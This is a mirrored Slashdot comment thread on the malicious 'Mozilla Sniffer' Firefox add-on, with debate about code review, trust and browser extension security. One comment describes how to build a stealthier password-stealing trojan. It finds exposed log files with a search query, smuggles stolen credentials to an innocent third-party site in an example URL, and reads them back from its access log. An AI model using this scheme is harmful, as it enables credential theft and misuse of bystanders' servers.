Slashdot Mirror
How the Mozilla Sniffer Backdoor Was Discovered
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
Looks like the stolen data was being sent to a hacked BlueHost account. Figures.
there is no way some rogue developer could hide password stealing code in them.
And since Opera is not open source, there is no way to be sure of that.
And Firefox is open source, and there is no way to be sure of it.
"Sacrifice for the good of The State" - The State
[...] Opera comes build-in with all the features I need [...]
FTFY. I prefer Firefox's way of offering a basic browser and moving extended or niche features to optional extensions to monolithic blocks like Opera. Of course there is a risk associated with this model, but in my case the benefits far outweigh that risk.
Rudolf Hess edited Mein Kampf. He was the very first grammar nazi.
What was the addon supposed to do?
Unless you go through all the code yourself, there's no way to be sure of anything. And unless you're uber-bad-ass, its going to be really hard to understand every line in a massive code-base someone else wrote, let alone all they all play together. So, even if you do your own audit, you can't really be sure. Life's a bitch, isn't it?
It is impossible to be sure, all sorts of surprisingly devious side channels have been devised(that, and some fairly dramatically invasive behavior by vendors has become accepted as normal; after all, only a freetard would object to an application phoning home routinely...); but for something like Opera, where "non-malicious" network activity is fairly easy to characterize, checking for malicious network activity is far from impossible, without even touching the binary(something like Skype, on the other hand, where the network activity is a big, fat, blackbox, is a lot trickier).
In this case, for instance, the malice was flagged by somebody watching network traffic, which is pretty trivial on any platform that doesn't have a bad case of being a console/iProduct. A purely binary, closed source, application could have been caught in exactly the same way.
Good job not actually telling the name of the offending plugin in the article blurb there. 'A new severe bug in mozilla is allowing hooligans to steal your passwords. But we won't tell you which one until after the break!'
I have nothing compelling to say
Do you mean to say that, when I install a Firefox add-on, Firefox won't give a list of requested privileges? Why has it taken 30 years for people who think in Unix security terms to not catch up to the VMS "fine-grained privileges to executables for users" security model?
The whole regular user / root thing is awful. Microsoft is still doing it wrong because, while the NT kernel may approach the right idea, it builds atop it a mess of get-out-of-jail-free paths.
It's not impossible.
(1) By default, allow nothing;
(2) Never allow everything - require software to specify exactly what it needs;
(3) Classify permissions so the user is alerted more violently for more risky permissions - this may depend on the circumstances (e.g. a browser add-on usually shouldn't be asking for the same sort of privileges as backup software);
(4) Software which needs an unusually privileged environment may benefit from auditing and signing, but never make this compulsory because this pisses off everyone;
(5) But, by default, refuse in such circumstances and indicate why. The user needs to make a conscious effort to override a reasonable set of auto-refusal defaults;
(6) Distinguish explicitly between once, occasional, time-limited and forever permissions. To take a particularly insidious example: iPhones ask if you want to give permission for your app to read your GPS location. This isn't permission for the next 15 minuts or day; it's permission forever. That is wrong. Looked at from the other end, don't do a Vista and ask every time. This is worse than not asking at all.
More thoughts, guise?
There's no way to be sure of anything, but as far as risk goes, you have to admit that trusting one vendor with a financial stake in not having a privacy loss scandal is a lot easier than trusting any random person in the world who can submit a plugin to the mozilla site.
I'm a software developer, but I'm not going to go over every line of source code for the applications or plugins that I install on my computer. Seriously, even if you did, have you ever read along with or participated in code obfuscation contests? Many developers with malicious intent can make evil code look totally innocuous.
Why are you letting these clowns ruin our country?
This is why I love that Opera comes build-in with all the features you need and a lot more
As a geek, I enjoy complexity to an extent. It's cool to have a gadget with lots of nifty features and shiny buttons. But even I'll admit that at some point it can become unwieldy.
I personally prefer a basic browser with a plug-in model that allows me to extend the functionality in whatever way I feel necessary. That way I can add all the shiny buttons I want, without having to deal with the unwieldy stuff that other people want.
Not only are they made using the same quality standards and conventions, there is no way some rogue developer could hide password stealing code in them.
Actually, there is.
One of the Opera developers could go rogue. Or some machine in their development environment could be compromised, which could lead to the distributed software being compromised.
And since Opera is not open source, we'd have to rely on the Opera developers themselves to find the issue. An open source model means that basically anyone with the time/inclination/skills can go in and take a look at the code.
"Work is the curse of the drinking classes." -Oscar Wilde
Is there? Apple's review process doesn't demand source(and, given the review volume, there is Absolutely. No. Way they would be giving proper attention to detecting subtle malice, even if they did). The review process seems to be reasonably good at weeding out applications that crash horribly often enough that the reviewer will run into a crash, which blatantly violate the rules, which seem likely to be fodder for stories that will tarnish Apple's PR, or which "duplicate" some feature that exists or is on Apple's secret roadmap. It has also been rumored that they have some sort of static analysis tool to detect use of private APIs.
.NET one, and as they have announced they will do here).
Nothing in that process would detect any but the most blatantly unsubtle malice(and, given that reviews tend to occur fairly quickly, something as simple as recording the date of first run, and not doing anything evil until 1 month has passed would probably count as "subtle" for the purposes of this exercise).
If malice is detected by a third party, or by some after-the-fact spot-check; both Apple and Android have practically identical capabilities to "unpublish and remove" an application from any device that hasn't been divorced from the mothership. For that matter, Mozilla can also issue FF updates that disable add-ons(as they did a while back for that MS
>And since Opera is not open source, there is no way to be sure of that.
Sure there is, you can reverse-engineer it to see what it does. You know, just because all you have is the binary doesn't mean you've suddenly entered a magic land where nothing can be understood.
(I'm going to ignore "but can you trust your tools" asshatery)
Belief is the currency of delusion.
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
Unless you go through all the code yourself, there's no way to be sure of anything.
Only thing that can be made about that statement is to point to a nice little presentation by Ken Thompson. Take a look at 'Reflections on Trusting Trust'. Almost certain you haven't seen it given your comment.
on Apple's store your suggesting we avoid Apple products? I figure you were going to imply Android as being less safe, but the only recent story about market safety I have seen is someone exploiting iTunes accounts to the benefit of a single developer.
though it would be interesting to have two bad apps released simultaneously into both markets and see which one gets caught first
* Winners compare their achievements to their goals, losers compare theirs to that of others.
This is where the "many eyes" comes into play for open source...
This guy is a native English speaker with a good education and almost surely a security professional trying to see how far he can get. The typos he has NOT made give it away, among other clues: (1) "it's" is always correctly used (2) looks like he deliberately added plurals making it look as though his English is poor (3) John "Devid" (4) "check it out" (5) "don't" is correct (6) no other spelling characteristic Eastern European mistakes
Just my opinion, I could be wrong.
Simples
Unless you go through all the code yourself, there's no way to be sure of anything.
you mean unless you go through the code, compile it yourself using a compiler whose code you've also audited and itself was not compiled by an unaudited compiler
No, I've seen it. I used to have a pretty decent email pen-pal thing going on with Ken about 10 years ago. He's a pretty cool dude. The point is, yes, even if you see the code, unless you have the code to the compiler and build it yourself, then you can't trust the binary. Basically, you can't trust anything you don't create from scratch. There could also be back-doors in ROM in the hardware. Which is why I go on to say how even if you do your own audit you can't actually trust anything. Either you won't understand everything, you'll have taken in too much information and miss something vital or,as per your example, the real root of the problem will be so obscured from view that it doesn't even matter what you're auditing.
Well, I like most people, run random executables but only if they are retrieved from trusted sources. Any package I install from my distros repository can potentially contain malicious code but I trust that the distro maintainers keep their stuff clean. I used to trust Firefox extensions downloaded from addons.mozilla.org in the same way, but not so anymore. That's why Chrome's and Opera's software models with built-in features over addons are superior to FF. Because you only have to trust one party instead of dozens of plugin authors.
Football Odds
>>>And since Opera is not open source, there is no way to be sure of that.
I think we can trust the Opera developers. They've been around long enough (15 years), and they are the #1 browser in eastern Europe and Russia* so someone would have caught them by now, if they were thieves. ----- My main complaint about Opera's built-in features is it creates a memory hog. I don't need AdBlock or Bittorrent or Mail in my web browser. Using Firefox allows me to have a leaner program that is stripped of those features.
*
* Or so I've heard. I've never seen any proof.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
This is why I love that Opera comes build-in with all the features you need and a lot more.
Except that it doesn't. I heavily rely on Firefox extensions to, for example, manage my tabs. It's entirely possible for me to work on three projects, each with ten to thirty tabs associated with them, while simultaneously using the same browser for personal stuff, which incurs further tabs. Having fifty or more tabs open at the same time is not unusual for me. Does Opera have an easy way of organizing a huge amount of tabs without having to use additional windows (which break the way I partition my screen)? Firefox has an extension for that. I can even suspend tab groups and open them again later if I know I won't need them for a while.
Likewise, is Dragonfly as powerful as Firebug? Can Opera give me the sent and received HTTP headers in realtime? User styles and plugins not distributed with the browser don't count; you're positing that Opera already comes with anything I need. Plus, what about ARM?
Don't get me wrong. Opera probably does come with anything a casual desktop/notebook user needs. Some people have requirements that don't mesh well with what the Opera devs thnk the average user wants, however, and in that case Opera becomes rather unattractive. Given that this is Slashdot, the assumption that the people here are average users may not be sound.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
Obviously, their grammatical misconceptions cost them something, this time.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
Uhhhmmmm - yeah, I think. I guess I'm a freetard. Now and then, I'll fire up Wireshark, and just watch the traffic. Yeah, I can see that my deviant son is browsing a porn site. I can see that the wife is checking her email and the banking. I can see that the other kid is looking for car parts. And - the other other kid is playing games. But, why on earth does he have packets going to http://xxx.xxx.xxx.xxx/ ??? That isn't a game site - he's not browsing, or there would be a lot more packets. Hmmmmm. A little checking, and I holler at him. "Have you installed anything lately? Have you done a virus scan on your stupid Windows laptop? What is this site?" He looks at it, tells me it's nothing HE ever heard of, goes back to his machine, and does some checking. An hour or so later, he admits that he was testing some stupid schitz that one of his buddies recommended. One of the features happens to be a trojan.
I don't bother making reports - I guess if I did, I might get my name attached to some zero day thingy. Hmmmm. That might not be good either. The better known you are, the harder it is to stay anoynymous when you really WANT to be anonymous!
"Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
The addon was called "Mozilla Sniffer", and people still installed it? I would understand if this was some functionallity hidden in a valid sounding addon but its called "Mozilla Sniffer". User FAIL.
Rob
You could try Dillo.
Do what thou wilt shall be the whole of the Law
Seriously, even if you did, have you ever read along with or participated in code obfuscation contests?
Any obfuscated code, especially if it's FOSS, should be suspect. Either they have something to hide, or they're a shitty programmer. Either way, I don't want their code on my hardware.
Free Martian Whores!
History is retarded, I've had it disabled since I first started using browsers with the "feature". Bookmarks should also be an add-on since most home users really don't need it to save their Facebook and Hotmail links.
Reminds me of a line in Doctor Who's last season:
Amy: You don't always tell me the truth.
The Doctor: If I always told you the truth, I wouldn't have to ask you to trust me.
Trust is not a state of absolute certainty or God-like understanding. In the end, it's a process of establishing your own comfort. You have to decide which risks matter to you personally, and which assurances are sufficient.
Trying to guarantee that every component and piece of software in a computer is "benign" to everyone is a fruitless, endless process.
But I certainly appreciate the complications you bring up. In the final analysis, all trust must be conditional, and revocable.
--
Toro
I like most people as well!
The only issue with Opera is that they keep adding retarded things like BitTorrent downloading and built in web servers. It also doesn't help that they try to change the entire UI with every milestone.
I still don't see myself switching away any time soon.
Jim: This source is fine.
:D
Jon: This is great, good work.
Jane: Clean and efficient, great addon.
*Create account: Jack*
Jack: Yeah, awesome stuff! Jim, Jon, and Jane are all correct.
*Create account: James*
James: I love this addon! No viruses here
Finally had enough. Come see us over at https://soylentnews.org/
TabGroups Manager. It's not the only extension of its kind, though: There's also Tree Style Tabs that gives you hierarchical, if space-intensive, tabs and Tab Kit, which apparently offers both functionalities in one package - however, I haven't tested the it and can't say how well it works.
In case you're a beta user: Tree Style Tabs says it's 4.0b1-compatible; TabGroups Manager doesn't but works apart from a cosmetic issue (the tab group bar appears below the tab bar instead of above it).
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com, (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
And since Opera is not open source, there is no way to be sure of that.
So slashdot. So retarded.
When was the last time YOU PERSONALLY read and understood EVERY LINE OF CODE you run?
Did you fabricate your own CPU too?
Shit being open source isn't some magic blanket of security. In fact, just the opposite: People blindly trust open source code thinking "someone else reviewed it". Who? Do you know their name? Do you know their review process? Do you know they're competent, and not just some 19 year old in a dorm room killing time between beer runs and WoW raids?
If Opera maliciously fucks you over, guess what - you have someone who is legally culpable. If your repository gives you a lemon, oh well!
LOL
Extension of trust works as follows:
If you trust Bob, and Bob trusts Alice, you trust Alice.
However, no one ever fully trusts Bob.
So, more explicitly, extension of trust is as follows:
If you trust Bob to a degree, and Bob trusts Alice, you trust Alice to the same degree that you trust Bob.
But this is incorrect as well. Because Bob's trust relationship with Alice is also "to a degree". Let's try this again:
If you trust Bob to a degree, and Bob trusts Alice, you trust Alice only to the product of the two degrees.
Trust does degrade with each step in the relationship chain.
One of the most common "degrees" of trust is a restriction on forwarding that trust. We never actually "trust" Bob, we simply authorize him (as a supplier of code, a maintainer of data, etc.) to access our shit because we need to get shit done. The "trust" relationship is not freely given - privacy and access are sold in exchange for access to various services.
Thus, the degree of trust in an actual relationship is not a measure of actual trust, but a measure of what you are willing to risk.
The claim against the "you can only trust yourself" argument is that if you trust Bob, you must trust Alice in the same manner, because you are trusting Bob's integrity (who he chooses to trust). The claim is bullshit, because we never "trust" Bob - we simply accept a certain level of risk, and built into our threshold of acceptable risk is the restrictions on who Bob can extend that trust to.
The bottom line is that we can indeed choose to trust Bob completely and choose to not trust Alice at all. This is because the "trust" relationship is never actually based on trust - it is based on risk.
This then should be the contest for you!
I prefer Firefox's way of offering a basic browser and moving extended or niche features to optional extensions to monolithic blocks like Opera
Theoretically, I prefer that too; but somehow opera with more features than the entire mozilla suite is still smaller, faster, and more stable than a barebones firefox :/
I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
Source is ok ... but can you trust your compiler?
Yes, that's what we're talking about. Thanks for being the retard who points out the obvious.
Every line of source code? That's just silly. Who can be sure of anything that way? I inspect every packet going into and out of the computer by hand.
Having a History function is retarded. If you don't know which sites you've been to then you have some serious mental issues that you should have investigated. If Opera took those functions out and added them to their site under a plug-ins section then people who don't have Alzheimer's could have a nice lightweight browser.
Despite your retarded attitude, most people do, in fact, only visit a few sites with short, easy to remember, URLs. If someone wants some bookmarks, because he is mildly advanced compared to the rest of the public, he can go to the Opera site and click on the link which will load the small code into the browser.
Life is too short to use such a limited OS out of fear of identity theft. The cost/benefit analysis just doesn't line up.
Case in point: the Debian ssl fiasco, rendering all Debian as well as derivatives vulnerable to a simple attack for 2 years.
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?
Doesn't matter. Even then, most everything is complex enough and long enough that "someone" could find it (whether you rely on open source eyes or paid corporate code), but a single person reviewing all the code of everything they use is impossible. Given the rate of change of laws and regulations in the US, it is physically impossible to read all the rules that one must adhere to. You'll die of old age before you make it through. Yet ignorance of the law is no defense. No one can read all the code they use, even skimming it would be hard. So you have to trust someone somewhere. So trusting a company vs strangers becomes an issue of preference, not logic.
Learn to love Alaska